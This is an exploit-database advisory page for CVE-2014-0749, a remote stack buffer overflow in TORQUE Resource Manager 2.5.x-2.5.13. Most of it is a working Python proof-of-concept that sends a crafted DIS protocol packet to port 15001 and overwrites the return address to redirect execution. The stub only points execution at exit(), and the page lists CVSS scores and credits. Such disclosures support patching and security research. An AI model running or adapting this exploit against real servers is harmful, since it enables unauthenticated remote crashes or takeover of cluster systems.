TORQUE Resource Manager 2.5.x-2.5.13 Stack Based Buffer Overflow

2014.05.29
Credit: bwall
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/env python # Exploit Title: TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow stub # Date: 27 May 2014 # Exploit Author: bwall - @botnet_hunter # Vulnerability discovered by: MWR Labs # CVE: CVE-2014-0749 # Vendor Homepage: http://www.adaptivecomputing.com/ # Software Link: http://www.adaptivecomputing.com/support/download-center/torque-download/ # Version: 2.5.13 # Tested on: Manjaro x64 # Description: # A buffer overflow while parsing the DIS network communication protocol. It is triggered when requesting that # a larger amount of data than the small buffer be read. The first digit supplied is the number of digits in the # data, the next digits are the actual size of the buffer. # # This is an exploit stub, meant to be a quick proof of concept. This was built and tested for a 64 bit system # with ASLR disabled. Since Adaptive Computing does not supply binary distributions, TORQUE will likely be # compiled on the target system. The result of this exploit is intended to just point RIP at 'exit()' import socket ip = "172.16.246.177" port = 15001 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) offset = 143 header = str(len(str(offset))) + str(offset) + '1' packet = header packet += "\x00" * (140 - len(packet)) packet += ('\xc0\x18\x76\xf7\xff\x7f\x00\x00') # exit() may require a different offset in your build s.sendall(packet) data = s.recv(1024) s.close()

References:

http://www.adaptivecomputing.com/support/download-center/torque-download/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top